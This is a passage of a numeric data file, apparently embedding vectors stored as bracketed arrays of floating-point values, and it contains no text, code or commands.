5,0.03664781,-0.015127174,-0.030138748,-0.02599339,0.012216215,0.014264519,-0.029117772,-0.022317147,-0.031198226,-0.04622919,-0.018539077,0.05339563,0.021655481,-0.016436087,-0.05241226,-0.009631247,0.02073362,-0.037504178,0.01826838,0.06723208,0.011541603,-0.013721905,-0.036480963,-0.04549581,0.04817916,-0.053650565,-0.061580904,0.030742655,0.03348709,0.0036167826,-0.03655138,0.002382285,-0.011351536,0.011875486,-0.025797712,-0.027045188,0.0015964159,0.019556092,0.009003706,-0.0050757374,-0.01257547,0.061555997,0.011226191,-0.043013845,-0.011349663,-0.017847074,0.018071938,-0.0008800847,-0.022850016,-0.01722697,0.013756934,-0.05264301,0.028508637,0.0072190743,0.015150444,-0.058688838,-0.002987077,-0.05906741,0.019656202,-0.039322726,0.0410567,-0.023172876,0.003552254,-0.07201647,-0.05297456,0.026566254,-0.0479563,0.042233262,-0.057183616,-0.043672595,-0.07915129,0.04727306,-0.022512017,0.030940793,-0.03648398,0.03307763,0.061092936,0.012343937,-0.031990577,-0.0042553567,0.008685545,-0.03500595,0.020207655,0.070016146,0.0650616,-0.018652974,0.073745176,0.0380745,0.028506478,-0.0080179265,0.037577216,-0.074869104,-0.000041106665,-0.014450291,-0.03797615,-0.04426173,0.0027749327,0.050589595,-0.02283463,-0.021795211,0.059971705,0.0029635187,-0.010671686,-0.029141307,-0.045760915,-0.04812556,0.014341152,0.053660642,0.018968064,-0.036921278,0.0011752679,-0.009789573,0.07149681,0.04916082,0.0047517223,-0.0062695723,-0.007781128,0.019665562,0.038497295,0.0022919972,0.020840734,-0.0053407783,0.02907006,-0.026784252,-0.031240718,-0.011911056,-0.009703344,-0.047982648,0.019565525,-0.018896623,0.007788896,0.037389822,-0.029401531,-0.045869682,-0.05567182,0.022488063,-0.0034133377,0.039946076,0.0471906,0.025017045,0.03138279,-0.002609931,0.046269085,0.011493495,0.0117520215,-0.022157643,0.020297013,-0.014915133,-0.07758393,0.034662955,0.0058883037,0.03642838,0.041604374,-0.004430578,0.032440193,0.017695162,0.05297977,0.0017230575,-0.022326386,-0.0089203045,-0.023886964,0.007239079,0.034601104,-0.0033803738,0.027751943,0.02013306,0.016358968,-0.025112107,-0.057109807,0.06427897,0.015565971,-0.04262658,-0.042077783,-0.017275665,-0.026489506,-0.049413618,-0.060578063,0.034673713,-0.034621872,-0.0062440755,0.008160798,-0.009037945,-0.038426485,0.0046478417,-0.020531224,0.0045093885,0.074264884,-0.057030533,-0.026139215,0.017245714,-0.052365467,-0.01540267,0.024724526,0.057610165,0.099311136,0.050475575,0.042273782,-0.042795006,0.0055315346,0.0048047556,-0.021434689,-0.0788504,-0.005029333,-0.06398708],[0.020674268,0.0450688,-0.18653825,-0.049972713,0.109530166,-0.060840353,-0.011414783,0.046760287,-0.001067633,-0.056760527,-0.062324587,0.08390696,0.03746227,-0.000827654,-0.030267503,-0.079209894,0.034103822,-0.019771772,-0.0099707125,0.0041159084,-0.021324852,-0.061439265,-0.0073680514,-0.035849694,0.05603425,-0.0015859114,0.0031751401,0.029299533,-0.008225512,0.024797464,0.013013196,-0.02866987,-0.032347895,-0.01563104,-0.069537036,0.0022932668,0.04457341,-0.0021734273,-0.037541933,-0.022629267,0.021807095,0.037634693,0.032263916,-0.013018491,0.0060117203,0.04003644,0.046254814,0.06776097,0.017079415,-0.07766857,0.02835532,-0.03689131,-0.0028355103,-0.06833319,0.05103659,0.012658713,0.0031140905,0.0465199,-0.011261955,-0.03887477,0.06382216,0.063785575,-0.04686917,0.08830284,0.036057603,-0.03273639,-0.013115811,0.03852379,0.004307383,-0.015556506,0.036843542,0.010424311,-0.027563762,0.007210326,-0.021105966,-0.011781417,-0.015798995,-0.074216016,0.046524797,0.036024086,0.02058445,-0.038412854,0.065270565,0.00016606835,0.03214336,-0.05991704,-0.013251803,-0.01582552,-0.037432745,0.031392194,-0.0002567735,-0.035274655,0.03592474,0.03491203,-0.07674689,-0.010337999,-0.023158414,0.0061461795,-0.047333427,-0.0064972523,0.0012554493,0.029806077,0.019934718,-0.0149393305,-0.0024772354,0.036805566,0.03906945,0.049361758,0.0357964,-0.0032369872,-0.0026697142,0.0577619,-0.002965208,0.0017900794,-0.021208534,-0.010624493,0.046009142,-0.013735958,0.0014401096,0.023917213,0.0026731344,-0.07691244,-0.0009937243,0.084971204,-0.020438433,0.0021859233,-0.054586213,0.043586604,-0.012403251,-0.059192695,-0.033065837,0.00016762098,-0.02211069,0.0123410225,0.031290997,0.007425827,-0.011338101,-0.031755067,0.023975475,0.013606214,0.038303327,0.047464244,0.008289774,-0.056726303,0.008940519,-0.032016277,0.016342549,-0.038840793,-0.058692433,0.059854206,-0.0017248483,0.04336097,0.00909083,0.017118236,0.005009531,0.00342863,0.0014229,-0.008280509,0.009545972,0.036238737,0.0042100023,0.019567424,-0.024520556,0.04703124,-0.013242245,-0.01051875,0.01706998,0.08564292,0.015060612,0.030567477,-0.035469644,0.007655468,-0.02789603,-0.0060798973,-0.0061477637,0.02759185,0.027963247,-0.021822419,0.017455304,-0.047325123,0.04636923,-0.066761404,0.062318034,0.011905302,-0.025615022,0.011403239,0.022977563,-0.029394388,0.035852563,-0.021970324,-0.00846719,-0.0019934245,-0.070839755,0.0007713393,0.013923048,-0.06407217,0.01621729,-0.0023894878,0.020670215,0.044470552,-0.034245033,-0.039768808,-0.03571723,-0.0032337648,-0.068142444,0.032958135,-0.009664356,0.030387403,-0.0073879836,0.010568127,0.054028116,0.015432085,0.0016126656,0.010086367,0.0013893682,0.020803737,-0.023535104,-0.03947531,-0.042967826,0.027766496,0.025314556,-0.030238822,-0.030534115,-0.0201,0.038360845,-0.0098493425,-0.0067520905,-0.0140768215,-0.020857625,-0.028529132,-0.034396425,-0.07661393,0.05376613,-0.004816488,-0.04442926,0.031435285,-0.004209517,0.0528824,-0.0358721,0.032155238,-0.0039437884,0.05520359,-0.018137433,0.032344446,-0.005865264,0.016028143,-0.029579591,-0.053787965,-0.030956818,0.01802669,-0.020324785,0.019345718,-0.00022794068,-0.014229907,0.007618345,-0.025308553,0.008199421,-0.0021983439,0.033674784,-0.021175653,0.0040825717,-0.0020803588,0.021251423,-0.026659101,-0.040045198,-0.04590577,-0.03625777,0.03375881,0.0023523537,0.011094431,-0.034600936,0.039321955,0.055632494,0.06430743,0.0026993195,0.0030992257,-0.0034800414,-0.026511624,-0.029512223,0.053111542,-0.054283604,-0.017700242,-0.013548217,0.010576632,0.006220232,-0.020219592,-0.00963331,-0.0011661709,0.0032053904,-0.039701782,0.08087555,-0.04881251,-0.06301829,0.05604632,-0.043206297,-0.015948143,0.071325414,-0.02564416,0.00015212559,-0.03438259,0.042827487,0.062045943,0.021335786,0.03950524,-0.009558531,0.0021066535,0.055834964,-0.020966219,-0.027209748,-0.02832555,-0.05359259,-0.048708636,-0.053664126,0.047323424,-0.0030014843,0.014128903,0.05156566,0.03233046,0.043097094,-0.0023508877,-0.0214302,-0.025257101,0.012060917,-0.03545618,-0.0354022,0.040387124,-0.016464282,0.025143206,-0.026090074,-0.05555567,0.023307588,0.026006687,0.031089291,-0.07170212,-0.029583152,0.041041162,0.019431032,0.037960086,-0.036144696,0.07117608,0.017037014,-0.03634888,0.0047181547,-0.035222903,0.007375452,0.022371944,-0.06724567,-0.0052526197,0.067521654,0.023449842,-0.03438898,0.041105192,-0.03317531,0.0020182398,0.02135435,0.008837044,0.012718661,0.011502916,0.0093671195,0.008441019,0.03780281,0.0024809232,0.02386504,-0.010240918,0.011611437,0.035939004,0.035529774,-0.026360776,0.009503526,0.048608486,0.023972502,-0.06751194,0.03154494,0.023497097,0.008800905,0.019171981,-0.06288746,0.0015695724,0.0069410345,0.039120402,0.023387201,-0.06393471,-0.037115514,0.024648111,0.0057305847,-0.007457154,0.05663239,-0.010954422,0.010482647,0.05479891,-0.0034944923,-0.016082894,-0.020116542,0.018922364,0.008754419,-0.043380797,0.016508712,-0.033519097,0.0009585654,0.05321115,-0.035825126,-0.04052936,0.029766377,0.01812511,-0.005995591,-0.00029476985,-0.047451723,-0.025333617,0.104072616,-0.005073008,0.019436354,-0.005026878,-0.033351522,-0.028272305,0.038114913,0.003336145,0.07151654,0.012978635,-0.016259233,-0.07086801,0.009856825,0.015542551,0.029663766,0.018266937,-0.014683911,0.039068278,-0.019026963,0.025857056,0.043311745,-0.09003993,0.053782456,0.011420041,0.015436936,-0.055324715,-0.010424406,-0.024242535,-0.004913855,0.02307008,0.021279568,0.030581664,0.014933387,-0.005956625,-0.053550754,-0.0024065683,0.016223269,0.06376001,0.11563263,-0.019903075,-0.038947325,0.047116674,0.013336885,0.012810989,0.021842308,0.0044903522,0.0890871,-0.027766453,0.016153041,-0.029264323,0.038053185,0.011243384,-0.0026007784,0.010134289,-0.04332392,0.01929881,0.048764247,-0.0008412355,0.030379564,-0.038719732,0.056022424,0.0681271,-0.037031334,-0.028263735,0.015732156,-0.017009119,0.062273297,0.02834137,0.021966444,0.012341641,-0.005054195,0.088375,0.030346401,-0.032587487,-0.040066563,-0.04964461,-0.023346512,0.035799026,0.032623127,-0.008802752,-0.025424132,0.012957323,-0.019595083,0.05238616,-0.011237259,-0.0059622005,0.0021535384,-0.023236211,-0.023039293,-0.012486495,0.013070118,0.02942971,0.029808225,0.00479028,-0.03285405,-0.0009131589,-0.0034171059,-0.03661466,0.04042734,-0.05635486,-0.0030262177,-0.07932484,-0.024014186,0.00095973426,0.045419548,-0.010058842,0.05283124,-0.029046966,0.0033958345,-0.03978739,-0.034660686,0.007966366,0.035928834,-0.049659893,-0.05775096,0.01753004,-0.049297206,0.019825257,0.022036986,-0.0194516,0.01066431,0.0145670455,0.0036357625,-0.02579245,-0.050835308,-0.017850067,0.038564947,0.020128092,-0.024606792,0.03412146,-0.020147782,0.0041945176,0.007549161,0.013013794,0.0198835,-0.0650999,-0.011277339,-0.0585985,-0.009239833,0.038838547,0.0133562945,-0.054189585,0.03151651,-0.03712029,0.017630806,-0.043592047,0.06838475,0.011128047,-0.017670022,0.00518736,-0.029974073,-0.06316214,-0.0067567797,0.01194021,0.08110192,0.013636833,0.027710918,-0.01392891,-0.032989014,-0.0017429495,0.022625705,0.012214356,-0.020456763,-0.05753905,-0.03537054,-0.05589478,-0.0063942424,0.03970419,0.00039546896,0.011334452,-0.052672837,-0.031202221,0.03271145,-0.038516745,0.016131701,0.028025948,0.00037650717,0.005331115,-0.015393903,-0.041174393,0.0526308,-0.018440017,-0.07532988,0.030721122,0.015519863,0.029574411,-0.018943239,0.027555183,-0.029696047,-0.0016316961,-0.034900617,-0.024650875,-0.012586193,-0.0041598394,0.017743303,-0.00031784165,-0.0028232653,0.08322975,-0.0003524983,-0.042038094,-0.025731593,0.01797491,0.009851373,-0.011224575,0.0021032095,-0.04815037,-0.0009287852,-0.07961275,0.031620238,0.023850871,0.018122507,-0.062283456,0.023664724,-0.037016835,0.020375,-0.037098516,0.026931701,-0.041217364,0.01651999,-0.029585522,-0.010617118,0.021975154,-0.048065774,0.056099486,-0.062248994,-0.05584677,-0.094243936,0.058110934,-0.019716814,0.03421281,-0.05694142,0.05272707,0.056384005,0.012997873,-0.02649948,-0.009304851,-0.021007728,-0.002615401,0.0056131925,0.06748786,0.04344593,0.012483136,0.046401512,0.06487708,0.01520524,-0.0053744633,0.016768055,-0.04962942,0.0010685587,-0.025017826,-0.0868746,-0.027245585,-0.0037442676,-0.0018664467,-0.0051510916,0.0037724753,0.07108523,-0.014142394,-0.00009811362,0.0041833823,-0.03897662,-0.023263708,0.0035690968,0.024913752,-0.0029899557,-0.058124673,0.024266025,-0.052203543,0.054237626,0.039704412,-0.04349593,-0.0043100067,0.0064876745,0.00059088896,0.058083396,-0.020325547,0.015559092,-0.048790168,0.028544344,-0.018746177,-0.0249826,0.0073396624,-0.022698123,-0.02675138,0.00202306,-0.008417452,0.02321308,0.04537951,-0.03809603,-0.06901706,-0.052518543,0.04293549,0.029211499,0.03121787,0.050092928,0.031858157,0.033644337,0.005694554,0.06200389,0.034503695,-0.020905105,-0.0141531415,-0.009202246,-0.0012853798,-0.05570087,0.039112404,0.028759062,0.008121891,0.00890347,-0.011048739,0.018213334,0.007313149,0.061437383,0.0013270056,-0.022516526,0.017507447,-0.008525418,0.033172652,0.028580025,0.024103638,0.036579877,-0.0077301026,0.0051608025,-0.014642486,-0.025424905,0.09366701,0.010272851,-0.025998626,-0.020245127,-0.009721127,-0.045676358,-0.043779925,-0.04889811,0.034713607,-0.04823014,0.005169585,-0.020624764,-0.007043816,-0.036434736,0.0132611245,-0.023949103,0.011223054,0.04185165,-0.04399367,-0.008506812,0.0046477085,-0.055739526,-0.0050325026,0.0062972945,0.045625046,0.094313055,0.022913422,0.018419677,-0.039504226,0.019774575,0.047264326,-0.0048766444,-0.035875864,0.00085067854,-0.06888292],[-0.027829014,-0.0069089765,-0.15426514,-0.023484267,0.058260523,-0.04808966,-0.042536538,0.030311424,0.011242583,-0.045540173,-0.04571379,0.058933523,0.051709566,-0.011408688,-0.007004005,0.011421932,0.06651711,-0.040380854,-0.0033923737,-0.0040106312,0.010995914,-0.07100401,-0.00056044577,0.0032808208,0.0933024,0.034393758,0.04062654,0.0030595013,0.025983231,0.01165725,0.03523384,-0.042430986,-0.023760166,-0.018759772,-0.051378053,-0.04530435,0.016206123,-0.00019526303,-0.039558694,0.023317074,0.002639422,0.0033067772,0.007383707,-0.0007271096,0.03484334,-0.024391599,0.026227318,0.03816345,0.048897587,-0.072118156,0.0101948865,-0.06383169,0.005635182,-0.03240907,0.08044579,-0.0060593323,0.027901603,0.027171716,-0.022743013,-0.023654351,0.08598799,0.044786736,-0.0016823852,0.06426877,0.03281629,0.017506532,-0.02243611,0.051684443,0.043307673,-0.015700275,0.030258143,0.002924229,-0.01309232,-0.047238786,-0.017700417,-0.03992138,-0.05145582,-0.08548388,0.020702412,0.038613237,0.014261138,-0.04055073,0.08504751,-0.02544911,0.049314927,-0.013316885,0.031883057,-0.0008296806,-0.045793086,0.009063744,0.009865972,-0.0104163205,-0.03413377,0.047858223,-0.06398225,0.009704138,-0.01155741,0.028189125,-0.021157311,-0.051779684,-0.0047917045,-0.035456765,0.049195472,-0.024785904,0.012032622,0.03995107,0.025631018,-0.0032621224,0.01739756,0.04848094,-0.0094303675,0.04050799,0.037333716,0.007455711,0.06343929,-0.011480636,0.04125322,-0.041108772,-0.00034091435,0.06376072,-0.010480558,0.0148863075,-0.024093876,0.013854589,0.00705899,-0.0075598774,-0.08042021,0.005539775,0.015422553,-0.04799873,-0.009066028,-0.0018113552,-0.05344013,-0.0075385277,0.04675307,0.018954838,-0.051388282,-0.05436272,0.00037153502,-0.02735602,-0.032869846,0.01163488,-0.015481258,-0.028413387,-0.020860305,-0.027143016,0.019905414,-0.03232648,-0.06807229,0.025506776,-0.008564902,0.0033519429,-0.005584208,0.032365534,0.022394389,-0.036983628,-0.02811373,0.0035315184,0.0018545182,0.05873161,0.009972822,0.03522157,-0.033486582,0.04357727,-0.017791014,-0.04620533,0.009728061,0.08206905,-0.013838436,-0.010860333,-0.026542448,-0.011760495,-0.022574663,-0.028585454,-0.006981826,-0.01975518,0.023823403,-0.030324811,0.024969468,-0.008753953,0.056696746,-0.052273184,0.05656847,0.027869677,-0.0044335914,-0.025127178,0.023164539,-0.010481594,0.020372491,-0.014227277,0.07196639,-0.028560879,-0.04336,-0.03508349,-0.038576648,-0.05931063,0.00729157,0.02158091,0.048993647,-0.0060693067,-0.047832288,-0.0148456795,0.020135036,-0.027087744,-0.039667588,0.04981414,-0.0022219657,-0.012313674,0.0038849136,0.030921405,0.07033874,-0.029805342,-0.005691164,-0.031133829,0.027094545,-0.026711,-0.00068495853,-0.046302274,-0.06463034,-0.015746789,0.030587386,-0.005209589,0.026882378,-0.011741076,0.029192943,0.030694628,-0.0534304,0.013504131,0.0128958635,-0.029328685,-0.03968263,-0.085856155,0.057784215,0.065806165,-0.023775531,0.01746971,0.0066442266,0.09333884,-0.02405949,0.007150417,0.008468569,-0.0030909225,-0.01100909,0.0498399,-0.053611442,0.06448359,-0.024539776,-0.06617582,-0.03682091,0.02175209,0.00059212587,0.024718668,0.0021520462,-0.018121814,0.025060112,-0.06965672,-0.038675636,0.0044794725,0.017392816,-0.011646364,0.037025057,-0.015827091,0.030932562,-0.04298528,0.031119619,-0.047071766,-0.05402719,0.08487321,0.04634147,0.017398171,0.0089423405,0.06572854,0.042968042,0.05152497,0.001793235,-0.0070438012,0.03018496,0.017342733,-0.02636384,0.00723396,-0.06586397,-0.02184732,0.001402103,-0.011514712,-0.011417175,-0.026682418,-0.0056498805,-0.0013382318,0.01564281,-0.0021761633,0.056637343,-0.02467931,-0.033768475,0.044058032,-0.04042789,-0.028124912,0.024876088,0.006565011,-0.007146619,-0.021071065,0.03483733,0.032806057,0.011812293,0.03206763,-0.038295485,-0.03257551,-0.010818394,0.07930739,0.0013031625,-0.013503151,-0.03656632,0.010974909,-0.015045346,0.046616208,-0.037309516,0.011638762,0.0018352392,-0.007985665,0.011485796,-0.014269354,-0.040196903,-0.046010874,0.0014668239,0.0008083853,-0.045644883,0.0449743,-0.05749226,0.01802329,-0.04585653,-0.050202414,0.014451592,0.052456245,0.031085486,-0.053932436,-0.0074916584,0.090144716,0.011507816,0.022799412,-0.004520484,0.017026348,0.03446499,-0.001711618,0.02712434,0.004243644,-0.04492092,0.023826657,-0.03565148,0.021951588,0.027311342,0.07939925,-0.07877593,0.025702452,0.015973637,0.008381144,-0.0017723956,-0.015649438,0.016172383,0.016781323,0.055304967,-0.0022994145,0.020675598,0.061771523,0.016680412,-0.011537773,-0.01492485,0.053967103,0.049760703,-0.024239631,0.0035905212,0.0021406345,0.011921252,-0.02907718,0.017044468,-0.01698244,-0.0054189386,0.03832643,-0.07711751,-0.0077696526,-0.014493002,0.043363936,0.00097239815,-0.0602557,-0.027781827,0.07022435,0.046958815,0.00011355801,0.022587838,0.008059904,0.027006393,0.0103080105,-0.00495981,-0.063819416,-0.020709973,0.054904472,0.02009629,-0.029655162,0.040919866,-0.0064359717,0.023126218,0.042694505,-0.059486162,-0.047906548,0.02494419,0.010424134,-0.04373229,0.023330975,-0.032720514,-0.045064576,0.05769567,-0.00685962,0.055424556,-0.035622574,0.0072728624,-0.04261332,0.0019070328,0.0053656977,0.048466496,0.027196988,-0.016597018,0.012435613,0.012937034,0.03119152,0.010630234,-0.0291259,0.0064983163,-0.014660838,0.013863902,0.043451358,0.011994595,-0.083511375,-0.014443467,0.015877249,0.02940765,-0.022698713,0.019402962,-0.04687097,0.020592432,0.025174573,0.010059838,0.016264686,0.048148386,-0.011808063,-0.06406684,-0.02652687,-0.012379292,0.0870224,0.10343032,-0.013484785,-0.014458957,0.011588574,-0.023887083,0.008223436,0.03818932,0.020792758,0.09125145,0.020328432,-0.0052843536,0.00786971,0.012144419,-0.0062488504,0.003223045,0.0026386902,-0.035628363,0.0076520997,0.009393586,0.025201995,-0.018434057,-0.0057916692,0.0462873,0.09827909,-0.038920112,0.0118854875,0.0470445,-0.031053228,0.008391096,0.017788453,-0.022123465,-0.0051388126,0.033624187,0.06997561,-0.018062806,-0.027241956,-0.03388301,-0.042675663,-0.020162025,0.01811438,0.02689076,0.023721492,0.0068070814,-0.010606992,0.0036208446,0.03243038,-0.014638158,0.017652305,0.004339143,-0.026083913,-0.02134511,0.03252512,-0.0040778,-0.03461303,0.04181805,0.008910831,-0.052501038,0.060399298,0.05725955,-0.062340636,0.030639896,-0.044084687,-0.06351285,-0.054198906,0.009420387,-0.037056953,-0.015225559,0.023617333,0.04984511,-0.06610383,-0.017768864,0.011705813,-0.069737665,0.008612238,0.010608403,-0.027459256,-0.008821107,-0.039413836,-0.07905244,-0.012498478,0.010934328,-0.016632492,0.018534992,0.017963672,-0.004228003,-0.0039441716,-0.06530301,0.0047653695,0.021292964,-0.024963807,-0.024298286,0.04335278,0.026942829,0.025685523,0.061559584,-0.006538787,0.016994186,-0.018361999,-0.04177607,-0.045577675,-0.024938865,0.05127025,-0.00088685844,0.0046805693,0.044668168,-0.049832996,-0.020735456,-0.017902749,0.029840885,0.0009092537,0.036315024,0.013003324,-0.01713723,-0.0069721825,-0.01687762,-0.0046898434,0.06278471,0.02489217,-0.016129943,-0.028725827,-0.0029698585,0.0018600948,-0.01568827,0.06058719,-0.019968364,-0.009649352,-0.04407699,-0.012454766,-0.0011531374,-0.013002764,0.04001258,0.011283698,-0.03216848,-0.038208373,0.029643435,-0.05640231,0.0499542,0.055693667,-0.03025244,0.01519733,-0.048947234,-0.07847635,0.058504254,-0.03260562,-0.04015867,0.007946195,0.04567621,0.043487627,-0.005446125,0.06410846,-0.04772577,-0.00016104711,-0.02028847,-0.046012085,-0.04813221,0.027273335,0.06822383,-0.024949899,-0.018218465,0.05917805,0.004826046,0.00028508515,0.012172649,-0.030401066,0.009248594,0.037151366,-0.0108094765,0.022287289,0.011787114,-0.05301173,0.012416311,0.029619195,-0.027762992,-0.013706605,-0.021826573,-0.04521222,0.028396865,-0.037541933,0.06145632,-0.013793184,-0.02114422,-0.045021318,-0.015747484,0.042821538,-0.061652716,0.009049001,-0.062396392,-0.068788104,-0.075772285,0.0110922875,-0.023280626,0.014938933,-0.032062877,0.06979459,0.05640892,-0.020785699,-0.018391255,0.025557484,0.015200839,-0.022097547,0.014172707,-0.0020334886,0.086834945,-0.0035175856,0.057331696,0.028701255,0.011368145,-0.038385816,0.018137671,-0.01628536,0.019719798,-0.029134687,-0.08865024,-0.006456107,0.015354144,0.017073967,-0.024250101,-0.023466513,0.051140245,-0.002010327,-0.0041317674,0.00345621,-0.04621078,-0.07852528,0.003172221,0.05991654,0.024102833,-0.057172555,0.0088496,-0.0054903906,0.07153753,0.017071715,-0.02191172,-0.014239977,0.00048402816,-0.04502661,0.043068815,-0.006799364,0.034175236,-0.057964507,0.045502376,-0.01325432,-0.015882501,-0.034158718,-0.004503324,-0.0048944326,0.009937622,-0.031829644,-0.017521108,0.018310409,-0.0031582695,-0.065119706,-0.063588835,0.053414736,-0.020045131,0.04807214,0.0053013293,0.043002054,0.021199934,0.016497288,0.025761737,0.029813666,-0.022931185,-0.024251781,-0.018449603,-0.022057567,-0.00055833434,0.041905552,0.01502811,0.02604183,0.034605168,0.021730144,0.010639574,0.010875619,0.06783515,0.02204451,-0.027020827,0.004101477,-0.010346048,0.0368431,0.061833,-0.019741446,0.055032495,-0.020051204,0.0055754576,-0.040956184,-0.04437003,0.036084063,-0.025211852,-0.033344068,-0.09069866,-0.008057471,-0.07051482,-0.03135915,-0.018371828,0.020386107,-0.021896634,0.01982717,0.00097452116,-0.0130377365,-0.0277406,0.01908825,0.028679242,-0.007836238,0.07199638,-0.02919641,-0.020497661,0.03587386,-0.007945921,-0.024279831,0.0062078596,0.000071141534,0.07402228,0.05206501,0.0026494714,-0.041345857,-0.04724297,0.022856778,0.001541948,-0.030118505,-0.014524962,-0.012834162],[0.027738743,0.048201513,-0.15310138,-0.061101146,0.066546895,-0.052789707,-0.010292649,-0.003739267,0.021548828,-0.037482478,-0.018232418,0.077091075,0.0706771,0.027531689,-0.014021243,-0.07437573,0.019826626,-0.0029631248,0.028310962,0.005463932,0.008135343,-0.081399485,-0.050523825,-0.05029068,0.059417687,0.013737564,-0.003581543,0.05660333,-0.01758165,0.076970905,0.03841635,-0.0059516733,-0.018487103,0.016020972,-0.012300628,-0.060040757,0.0005067556,-0.047063913,-0.029678792,0.009587348,-0.002168993,0.035469245,0.03600842,-0.017549545,0.017207976,0.06307836,0.05563796,0.002392195,0.046864565,-0.09121226,0.018046813,-0.046974592,-0.011504487,-0.054516442,0.05477631,0.04468636,-0.042676453,-0.03798014,-0.0069275894,-0.052507702,0.0349956,0.11897313,-0.038342513,0.057384424,0.015301764,-0.00794462,-0.07298809,0.04512382,0.020167949,-0.034018405,0.0538213,-0.013162017,-0.019677341,0.020169172,-0.006457296,0.03941185,-0.025782665,-0.02627186,-0.0011363972,-0.0025993737,0.006854893,0.010976798,0.07400669,0.00042885862,0.045202352,-0.03620058,-0.012470823,-0.025786566,-0.024628475,0.027783314,-0.013865985,-0.048779882,0.012265917,0.06995542,-0.06918993,-0.022126714,0.0109207025,0.04871184,-0.041920684,-0.06233873,-0.004791674,-0.024719948,0.036952462,0.014415218,-0.04155151,0.03181645,0.0358323,0.012156776,0.0153883295,0.016878821,0.0138242375,0.010283928,-0.009076863,-0.024292842,0.022604689,-0.02175193,0.009564235,-0.04309516,0.002795986,0.01970261,-0.025551166,-0.050555885,0.001337834,0.0105202515,0.0520598,-0.040796503,-0.00077843975,0.02543678,-0.0068233386,-0.085076384,-0.019526051,-0.02448905,-0.024879351,0.024698325,-0.0026720124,0.06889909,-0.017952729,-0.017957546,0.006289722,-0.008788473,0.017281352,0.01737655,0.018278107,-0.019283514,-0.0005865913,-0.026601072,0.025157947,0.015788952,-0.016291494,0.021427806,-0.029864574,0.018107738,0.0125577655,0.008782096,0.057313025,-0.024738465,0.0039005936,0.00814261,0.026094787,0.062312905,0.04001587,0.030397559,-0.043402404,0.07447177,-0.05551539,0.01698119,0.040029496,0.07110055,0.009522718,0.048387967,-0.039146975,-0.00861731,-0.038004797,-0.007271242,0.055036098,0.03157364,-0.0018991627,-0.06478282,0.010993625,-0.04573643,-0.009291384,-0.027742475,0.0131113725,0.0582294,-0.03640507,0.004573369,0.030093368,-0.04700954,-0.0028862578,0.015603212,0.007210766,0.01451456,-0.05260113,-0.035551272,-0.05636208,-0.03833222,0.01358075,-0.03212487,0.035007477,-0.0062224823,-0.027539263,-0.029785829,0.0023622075,-0.001050741,-0.053123515,0.0052582,-0.030810934,0.0027659268,0.014020187,0.047422916,0.051449485,-0.055929486,0.01683466,-0.02140773,0.008461274,-0.053706963,0.003923725,-0.044068053,-0.007499703,0.012739727,0.03325169,0.0014891597,0.09986842,0.01033042,0.027175449,-0.009810832,0.008986581,0.012311284,-0.022983877,-0.021214416,-0.02439237,-0.072437875,0.008748951,-0.011341872,0.03036073,0.042534217,-0.021299861,0.050829682,-0.010678873,0.013509453,0.01960311,0.025740087,-0.03521125,0.029595645,-0.007998924,0.014550569,-0.016445635,-0.044868782,-0.008391463,0.030850483,0.018132478,-0.008740983,0.0041867746,0.04143037,0.042299356,-0.0522158,-0.036451314,-0.046022676,0.015271522,-0.036318265,0.011383351,-0.01830629,0.0006092828,-0.044712573,-0.0092718685,-0.08151884,-0.045437038,-0.011076213,0.02234624,-0.011289854,0.006817197,0.031037029,0.008797099,0.065483384,0.017875982,0.025472712,0.0009256305,0.014800146,0.005893338,0.037002545,-0.04270912,-0.008720161,-0.0098884,0.013291934,0.046058018,0.003858745,-0.022231499,-0.03262346,0.009081126,-0.007427866,0.023420949,-0.02947657,-0.005340879,0.047608234,0.0483624,0.022329861,0.06748391,-0.002299271,0.021904321,-0.038416386,0.034992587,0.02893864,0.017127475,0.029418448,0.003996841,-0.0146752605,0.0347058,0.02399229,0.018444272,-0.0025761423,-0.06157187,0.03755311,-0.033599153,0.04184301,-0.03664515,0.012404992,0.034160145,-0.0016059629,0.016925443,0.003800544,0.025623051,-0.011948671,0.011654597,-0.024540648,-0.033134922,0.056566548,-0.012753919,0.06450927,-0.028270632,-0.0068563763,0.08351452,0.037358,0.048053995,-0.037732422,-0.054608043,-0.009777833,-0.014844229,-0.001160388,0.026013583,0.027203938,0.010946173,-0.022891784,-0.034800213,-0.02592229,-0.012611334,0.027794063,-0.04604784,-0.014757589,0.099299185,0.029840684,-0.015275384,0.031206032,-0.013420188,-0.009914262,-0.017259251,-0.012416987,0.012449426,0.030502353,-0.01436825,0.033314656,0.048047766,0.04019394,-0.017420799,0.002646312,-0.011110794,0.05635863,0.05905595,-0.031627353,-0.0015243313,-0.026928714,-0.012437925,-0.021429013,-0.048704162,0.045025807,-0.0024670665,-0.005559439,-0.0686171,0.009654539,0.022167727,-0.005630341,0.002478708,-0.067483135,0.03529433,0.025167407,0.01890362,0.029417014,0.012997838,-0.024686607,0.0054853735,0.0018967495,-0.009765161,-0.002118819,-0.017210443,-0.022910047,0.03679025,-0.054287355,0.003495931,-0.00726992,0.009731995,0.002564689,-0.02730579,-0.04032679,0.022276636,-0.020304643,-0.004603009,0.0065225596,-0.011261271,-0.06410221,0.07631746,-0.034690864,0.03243544,0.011803504,-0.0070492015,-0.045279086,0.02588853,-0.027870785,0.116012864,0.05030912,-0.0032485058,-0.036813144,0.042175714,0.060248114,0.0055186003,-0.016934143,-0.027740669,0.04764441,0.03301838,0.049902666,0.063244395,-0.04194221,0.0088570975,0.038747814,0.02170356,-0.041799646,0.006631129,0.0044049835,0.007221706,0.024448482,0.008305513,0.019289548,0.061269425,0.006202161,-0.035596557,-0.044462495,0.02860797,0.09833016,0.0676462,-0.022079257,-0.029765204,0.033026412,-0.017411336,0.02395189,0.0587587,-0.026361676,0.10269706,-0.0041490896,-0.022437746,-0.021668507,-0.007133158,0.008957209,-0.041945923,-0.0013250507,-0.067930825,0.004659821,0.056812957,-0.0066464837,0.0043945927,-0.050301824,0.032230366,0.040861964,-0.061765056,-0.024936702,-0.009789834,-0.010855454,0.039331056,0.006131296,-0.030913826,-0.00478654,-0.05243188,0.011126525,-0.009851377,-0.03485945,0.003985193,-0.10131425,0.010758878,0.050506216,-0.008723907,0.010381049,-0.013127606,-0.01124877,0.017275048,-0.010709825,0.028409708,0.008787285,0.0013260104,-0.022054823,-0.025596838,-0.009231411,0.012866323,0.052059427,0.010282297,0.010036018,0.0003689525,0.05970019,0.0095119355,-0.025106546,0.055257414,-0.04365941,-0.050851155,-0.06835061,-0.006756224,-0.00697734,0.0505217,0.03825931,0.07402203,-0.07385756,0.013620872,-0.015808238,-0.06565451,-0.013831395,-0.0020867297,-0.011474188,-0.046162352,0.0020505975,-0.03633512,0